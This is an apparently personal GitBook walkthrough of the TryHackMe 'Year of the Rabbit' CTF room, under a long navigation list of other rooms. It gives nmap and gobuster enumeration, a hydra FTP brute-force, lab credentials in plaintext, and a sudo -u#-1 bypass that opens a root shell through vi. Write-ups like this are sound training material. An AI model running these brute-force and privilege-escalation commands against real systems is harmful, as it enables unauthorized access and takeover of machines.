🔥
Red Team
  • Welcome
    • About
  • Methodologies & Resources
    • Enumeration
    • Gaining Access
    • Payloads
    • Cheat Sheets
      • Transferring Files
      • Privilege Escalation
        • Linux
          • Scripts
            • Bruteforce su
        • Windows
          • Recon Scripts
      • LFI / RFI
      • Buffer Overflow
        • Fuzzers
      • Command Injection
      • Credential Harvesting
      • Password Attacks
      • Command Injection
      • SQL Injection
      • Bypass File Upload
      • Burp
      • Static Binaries
      • File Info Gathering & Script Abuse
      • Credential Gathering & Cracking
      • Other Cheat sheets
      • Lateral Movement and Pivoting
      • Vulnerabilities Seen
      • Active Directory
      • Web
      • Enumeration & Brute Force
  • Walkthroughs
    • Tryhackme
      • Hydra
        • Container Vulnerabilities
      • Blue
      • Steel Mountain
      • Alfred
      • HackPark
      • Game Zone
      • Skynet
      • Daily Bugle
      • Overpass 2 - Hacked
      • Relevant
      • Internal
      • Buffer Overflow Prep
      • File Inclusion
      • Brainstorm
      • Gatekeeper
      • Brainpan 1
      • Upload Vulnerabilities
      • Pickle Rick
      • John The Ripper
      • Attacktive Directory
      • Weaponization
      • Attacking Kerberos
      • Post-Exploitation Basics
      • Common Linux Privesc
      • Linux PrivEsc
      • Basic Pentesting
      • Net Sec Challenge
      • Linux Privilege Escalation
      • Windows Privilege Escalation
      • Password Attacks
      • The Lay of the land
      • Enumeration
      • Windows Local Persistence
      • Lateral Movement and Pivoting
      • Bypassing UAC
      • Hacking with PowerShell
      • Corp
      • Mr Robot CTF
      • Retro
      • Breaching Active Directory
      • Enumerating Active Directory
      • Exploiting Active Directory
      • Persisting Active Directory
      • Credentials Harvesting
      • Red Team Capstone Challenge
      • Crack the hash
      • Ice
      • Bounty Hunter
      • Agent Sudo
      • LazyAdmin
      • Wgel CTF
      • Cyborg
      • Year of the Rabbit
      • Brute It
      • Lian_Yu
      • ToolsRus
      • Chill Hack
      • Bolt
      • source
      • Brooklyn Nine Nine
      • Anthem
      • GamingServer
      • Chocolate Factory
      • Archangel
      • Easy Peasy
      • ColddBox: Easy
      • Fowsniff CTF
      • Blaster
      • The Cod Caper
      • SQL Injection Lab
      • Agent T
      • Avengers Blog
      • Mustacchio
      • Team
      • Tech_Supp0rt: 1
      • Gallery
      • Jack-of-All-Trades
      • Mother's Secret
      • Traverse
      • Anonforce
      • Dav
      • Thompson
      • VulnNet: Internal
      • Library
      • Flatline
      • b3dr0ck
      • Lesson Learned?
      • Opacity
      • Plotted-TMS
      • GLITCH
      • Hacker vs. Hacker
      • Valley
      • magician
      • HeartBleed
      • Expose
      • dogcat
      • Madeye's Castle
        • Old Madeye's Castle
      • Startup
      • Overpass
      • 0day
      • Mindgames
      • HaskHell
      • Annie
      • ContainMe
      • Develpy
      • Watcher
      • Spring
      • Anonymous
      • Boiler CTF
      • Wonderland
      • Blog
      • Biohazard
      • UltraTech
      • The Marketplace
      • CMesS
      • FINISH - Linux Agency
      • Road
      • Tokyo Ghoul
      • GoldenEye
      • Oh My WebServer
      • HA Joker CTF
      • Ollie
      • Looking Glass
      • VulnNet
      • Olympus
      • Wekor
      • Bookstore
      • biteme
      • CMSpit
      • Peak Hill
      • SQHell
      • Zeno
      • ffuf
      • Burp Suite: Repeater
      • Burp Suite: Intruder
      • Burp Suite: Other Modules
      • Burp Suite: Extensions
      • Linux PrivEsc Arena
      • tomghost
      • The Docker Rodeo
      • Empline
      • The Great Escape
      • VulnNet: Active
      • battery
      • Hip Flask
      • TryHack3M: Bricks Heist
      • One Piece
      • Inferno
      • Kitty
      • AVenger
      • Umbrella
      • Stealth
      • Athena
      • Napping
      • CyberLens
      • Obscure
      • Wordpress: CVE-2021-29447
      • File Inclusion, Path Traversal
      • NoSQL Injection
      • Advanced SQL Injection
      • XXE Injection
      • LDAP Injection
      • XSS
      • DOM-Based Attacks
      • CSRF
      • TryHack3M: Sch3Ma D3Mon
      • PrintNightmare
      • GitLab CVE-2023-7028
      • Python for Pentesters
      • PowerShell for Pentesters
      • Web Enumeration
      • Holo
      • Linux: Local Enumeration
      • Linux Process Analysis
      • Windows Network Analysis
      • Bypass
      • CVE-2023-38408
      • SQLMAP
      • Deja Vu
      • SSTI
      • DNS Manipulation
      • Linux Backdoors
      • Linux Modules
      • RustScan
      • Windows PrivEsc
      • Windows PrivEsc Arena
      • Wreath
Powered by GitBook
On this page
  • Initial Scan
  • Scan all ports
  • TCP/80 - HTTP
  • Turn off Javascript
  • FTP
  • Privilege escalation
  1. Walkthroughs
  2. Tryhackme

Year of the Rabbit

PreviousCyborgNextBrute It

Last updated 9 months ago

Room Link:

Initial Scan

Kali

nmap -A $VICTIM

Scan all ports

No other ports found.

Kali

nmap -sV -sT -O -p 1-65535 $VICTIM

TCP/80 - HTTP

gobuster dir -u http://$VICTIM -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt

Turn off Javascript

Enter about:config into the search bar and select Accept the Risk and Continue.
Enter javascript.enabled into the search box at the top of the page.
Select the javascript.enabled toggle to change the value to false.

Kali

strings Hot_Babe.png

Kali

hydra -l ftpuser -P passwords.txt ftp://$VICTIM

FTP

Kali

ftp $VICTIM
password: 5iez1wGXKfPKQ

Elis creds is encoded with something called Brain fuck. There are tools online to decode it.

Kali

ssh eli@$VICTIM
Password: DSpDiM1wAEwid

Victim

locate s3cr3t
cat cat /usr/games/s3cr3t/.th1s_m3ss4ag3_15_f0r_gw3nd0l1n3_0nly\!

Victim

su gwendoline
Password: MniVCQVhQHUNI

Privilege escalation

Mostly followed the link below, we can't run sudo with root as we have (ALL , !root) here. if we had (ALL , ALL) it would be easy to escalate. Adding sudo -u#-1 to infront of the command allows us to bypass this.

Victim

sudo -u#-1 /usr/bin/vi /home/gwendoline/user.txt
#While vi is open run:
:!/bin/sh

Link:

Link:

https://www.dcode.fr/brainfuck-language
https://www.exploit-db.com/exploits/47502
https://tryhackme.com/room/yearoftherabbit